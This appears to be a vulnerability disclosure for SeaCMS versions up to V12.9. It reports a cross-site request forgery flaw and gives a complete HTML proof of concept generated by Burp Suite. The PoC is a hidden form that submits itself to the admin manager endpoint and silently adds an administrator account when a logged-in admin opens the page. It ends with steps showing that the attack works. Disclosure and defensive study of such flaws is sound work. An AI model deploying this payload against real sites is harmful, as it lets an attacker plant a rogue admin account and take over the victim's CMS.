Vulnerability description
Code audit of SeaCMS reveals CSRF vulnerabilities.
Problem type
Cross-site request forgery
Product
Seacms
Version
Seacms <= V12.9
Download address
The latest version download address: https://www.seacms.com/download/
Vulnerability verification (漏洞验证)
Construct the poc as follows
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/seacms/upload/t9ljh/admin_manager.php?action=add" method="POST">
<input type="hidden" name="username" value="test" />
<input type="hidden" name="pwd" value="test" />
<input type="hidden" name="pwd2" value="test" />
<input type="hidden" name="groupid" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Save as an HTML file and open it using another browser without storing cookies :
Simulate victim entering account password
Added successfully